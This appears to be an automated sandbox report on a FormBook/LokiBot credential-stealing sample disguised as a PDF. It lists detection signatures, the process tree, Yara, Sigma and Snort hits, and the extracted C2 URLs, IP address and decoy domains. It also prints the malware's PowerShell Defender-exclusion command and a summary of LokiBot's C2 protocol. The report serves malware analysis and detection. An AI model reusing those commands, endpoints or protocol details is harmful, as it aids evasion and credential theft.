Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ajanlatkeres_2024.05.29.PDF.exe

Overview

General Information

Sample name:Ajanlatkeres_2024.05.29.PDF.exe
Analysis ID:1448989
MD5:cff39149d540e851536383f64d5f5568
SHA1:2cd49c6f28ecea254e22a75e3e77092a67d26774
SHA256:795af0703ab2ab7cfcfcc38449e7da1a20967be437e5877ee27da317b3991357
Tags:exeHUNLoki
Infos:

Detection

FormBook, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected Lokibot
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ajanlatkeres_2024.05.29.PDF.exe (PID: 2820 cmdline: "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe" MD5: CFF39149D540E851536383F64D5F5568)
    • powershell.exe (PID: 7244 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • YLc7afPlL4RjCeK.exe (PID: 7524 cmdline: "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe" MD5: 6F4CDBC9CAC665D375E1F28138E79428)
      • powershell.exe (PID: 7664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegSvcs.exe (PID: 7676 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • RegSvcs.exe (PID: 7700 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
          • chkdsk.exe (PID: 7864 cmdline: "C:\Windows\SysWOW64\chkdsk.exe" MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)
            • cmd.exe (PID: 7888 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7532 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.61.137.215/index.php/3b1tenbkyj"]}
{"C2 list": ["www.sukhiclothing.com/dn03/"], "decoy": ["almouranipainting.com", "cataloguia.shop", "zaparielectric.com", "whcqsc.com", "ioco.in", "aduredmond.com", "vavada611a.fun", "humtivers.com", "jewellerytml.com", "mcapitalparticipacoes.com", "inhlcq.shop", "solanamall.xyz", "moviepropgroup.com", "thegenesis.ltd", "cyberxdefend.com", "skinbykoco.com", "entermintlead.com", "honestaireviews.com", "wyclhj7gqfustzp.buzz", "w937xb.com", "bakuusa.online", "sabong-web.com", "52cg2.club", "jasonnutter.golf", "odbet555.app", "vipmotoryatkiralama.com", "auravibeslighting.com", "pulsesautos.com", "imdcaam.com", "vivaness.club", "bovverbadges.com", "giaydonghai.online", "aditi-jobs.com", "numericalsemantics.com", "shoprazorlaser.com", "lovedacademy.com", "gets-lnds.io", "teyo293.xyz", "banditsolana.com", "delivery-jobs-76134.bond", "ppp5716.buzz", "zjmeterial.com", "de-ponqk.top", "bntyr76rhg.top", "servicepmgtl.world", "nailtimelocust.top", "paperappa.com", "80sos.com", "daysofbetting.com", "slaytheday.fun", "travauxdefou.com", "bx2zyg.com", "thecoxnews.com", "qriskaq.com", "top-dao.com", "krstockly1.shop", "roiwholesale.com", "pajero777ads.click", "twistedrubytx.com", "thesovreignkingdomofmaui.info", "cataclysmicgamingapparel.com", "verxop.xyz", "xn--kwra1023b.com", "winterclairee.com"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x175c0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x498b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 58 entries
          SourceRuleDescriptionAuthorStrings
          6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
            • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
            6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpackLoki_1Loki Payloadkevoreilly
            • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
            • 0x133fc:$a2: last_compatible_version
            6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
            • 0x123ff:$des3: 68 03 66 00 00
            • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
            • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
            Click to see the 55 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe", CommandLine: "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe, NewProcessName: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe, OriginalFileName: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe", ProcessId: 2820, ProcessName: Ajanlatkeres_2024.05.29.PDF.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe", ParentImage: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe, ParentProcessId: 2820, ParentProcessName: Ajanlatkeres_2024.05.29.PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe", ProcessId: 7244, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe, ParentProcessId: 7524, ParentProcessName: YLc7afPlL4RjCeK.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe", ProcessId: 7664, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe", ParentImage: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe, ParentProcessId: 2820, ParentProcessName: Ajanlatkeres_2024.05.29.PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe", ProcessId: 7244, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe", ParentImage: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe, ParentProcessId: 2820, ParentProcessName: Ajanlatkeres_2024.05.29.PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe", ProcessId: 7244, ProcessName: powershell.exe
            Timestamp:05/29/24-15:42:47.538291
            SID:2025381
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:52.927476
            SID:2024318
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:28.214472
            SID:2024313
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:23.375856
            SID:2025381
            Source Port:49789
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:28.962608
            SID:2024318
            Source Port:49791
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:22.752549
            SID:2021641
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:28.214472
            SID:2024318
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:52.927476
            SID:2024313
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:55.680526
            SID:2025381
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:46:10.058300
            SID:2025381
            Source Port:49808
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:36.746086
            SID:2021641
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:10.038270
            SID:2024317
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:39.311748
            SID:2024318
            Source Port:49773
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:30.801731
            SID:2025381
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:31.132505
            SID:2021641
            Source Port:49770
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:46:07.455148
            SID:2024318
            Source Port:49807
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:10.038270
            SID:2024312
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:39.311748
            SID:2024313
            Source Port:49773
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:20.705538
            SID:2024313
            Source Port:49788
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:59.101278
            SID:2021641
            Source Port:49804
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:25.723486
            SID:2021641
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:20.705538
            SID:2024318
            Source Port:49788
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:09.224417
            SID:2021641
            Source Port:49785
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:20.544811
            SID:2024313
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:17.418907
            SID:2025381
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:28.962608
            SID:2024313
            Source Port:49791
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:46.833672
            SID:2021641
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:50.755707
            SID:2025381
            Source Port:49801
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:48.086059
            SID:2025381
            Source Port:49799
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:58.470593
            SID:2024313
            Source Port:49781
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:20.544811
            SID:2024318
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:20.008059
            SID:2025381
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:44.907872
            SID:2021641
            Source Port:49775
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:31.801523
            SID:2021641
            Source Port:49793
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:14.760597
            SID:2024313
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:06.437304
            SID:2025381
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:45.418561
            SID:2024313
            Source Port:49798
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:31.346168
            SID:2024318
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:00.934566
            SID:2021641
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:01.102766
            SID:2021641
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:17.361906
            SID:2024313
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:17.880992
            SID:2021641
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:14.760597
            SID:2024318
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:17.361906
            SID:2024318
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:58.470593
            SID:2024318
            Source Port:49781
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:45.418561
            SID:2024318
            Source Port:49798
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:31.346168
            SID:2024313
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:14.729917
            SID:2021641
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:53.430975
            SID:2021641
            Source Port:49802
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:12.009845
            SID:2021641
            Source Port:49762
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:27.955456
            SID:2031412
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:03.852643
            SID:2024313
            Source Port:49783
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:06.434631
            SID:2021641
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:36.658231
            SID:2025381
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:22.948804
            SID:2025381
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:03.852643
            SID:2024318
            Source Port:49783
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:44:20.226591
            SID:2021641
            Source Port:49765
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:33.478550
            SID:2024313
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:49.526860
            SID:2024313
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:33.478550
            SID:2024318
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:01.201418
            SID:2025381
            Source Port:49782
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:58.351209
            SID:2021641
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:41.466952
            SID:2024318
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:49.526860
            SID:2024318
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:56.184812
            SID:2025381
            Source Port:49803
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:17.857076
            SID:2025381
            Source Port:49787
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:41.960861
            SID:2021641
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:41.466952
            SID:2024313
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:43:55.212846
            SID:2024313
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:50.288079
            SID:2021641
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:42:26.177150
            SID:2024318
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:26.168825
            SID:2021641
            Source Port:49790
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/29/24-15:45:39.931883
            SID:2024313
            Source Port:49796
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
